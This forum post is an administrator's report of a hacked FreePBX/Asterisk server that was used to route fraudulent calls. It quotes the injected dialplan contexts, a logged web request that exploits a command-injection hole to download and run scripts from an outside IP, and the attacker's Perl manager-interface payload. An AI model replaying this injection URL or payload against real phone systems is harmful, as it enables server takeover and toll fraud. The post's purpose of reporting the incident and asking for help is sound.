Hi,
This is my first post here so be gentle
I just wondered if anyone had seen this issue before. Over the weekend we received a warning from out SIP provider that we were routing unusual numbers of calls through our freepbx box (Asterisk 11.12.0 / FreePBX 2.11.0.38).
I checked the asterisk logs and sure enough there were calls that shouldn’t be there. Interestingly they all started with:
Executing [007xxxxxxxxxx@doclickoutcontextnow7:1] NoOp(“Local/xxxxxx@doclickincontextnow7-00000019;1”, ““Click Out Context””) in new stack
Which was odd because I’d never come across the context ‘doclickoutcontextnow7’ in my configuration - but sure enough when I checked:
[doclickoutcontextnow7]
exten => _X.,1,NoOp(“Click Out Context”)
exten => _X.,n,Goto(from-internal,${EXTEN},1)
[doclickincontextnow7]
exten => _X.,1,NoOp(“Click in Context”)
exten => _X.,n,Answer(999999999999999999)
exten => _X.,n,Wait(999999999999999999)
had been added to the bottom of my extensions.conf. My first though was ‘ahh - I’ve been hit by shellshocked’ - my second was ‘well if I have it must have been through the web interface’ so I checked the httpd logs and found:
xxx.xxx.xxx.xxx - - [27/Sep/2014:17:08:35 +0100] “GET /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget±O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk±rx+‘dialplan+reload’;/usr/sbin/asterisk±rx+‘manager+reload’;wget±O+/tmp/c2.pl+http://94.102.49.82/c.pl; HTTP/1.1” 200 22 “-” “-”
so checked my /tmp folder and found a c.sh script which was set up to modify extensions.conf accordingly as well as c2.pl which appears to make a connection to the manager interface of asterisk and initial calls between 2 given numbers with the following code:
$payload = “Action: Login\r\n”
.“Username: $user\r\n”
.“Secret: $password\r\n\r\n”
.“Action: Originate\r\n”
.“Channel: Local/$phone@doclickincontextnow7\r\n”
.“Context: doclickoutcontextnow7\r\n”
.“Exten: $number\r\n”
.“Priority: 1\r\n”;
$payload .= “Async: yes\r\n”;
$payload .= “Callerid: $phone\r\n\r\n”
.“Action: Logoff\r\n\r\n”;
I removed these files then visited the URL:
http:// ip of my freepbx/admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget±O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk±rx+%27dialplan+reload%27;/usr/sbin/asterisk±rx+%27manager+reload%27;wget±O+/tmp/c2.pl+http://94.102.49.82/c.pl;
In my web browser and the exploit reinstalled itself. I’ve applied all the updates for centos and all the module updates for freepbx and the above link still installs the exploit even when I’m not logged into the web interface as an administrator.
I wondered whether
a) anyone else had seen this before
and
b) is this actually an exploit in common_admin_functions.php that should be fixed.
Now I’m pretty sure this isn’t a shellshocked exploit but I guess the moral of the story is not to leave your freepbx box admin interface open to the internet - especially on port 80 so I am no longer doing so but I’d be interested on peoples feedback.
Regards
Mat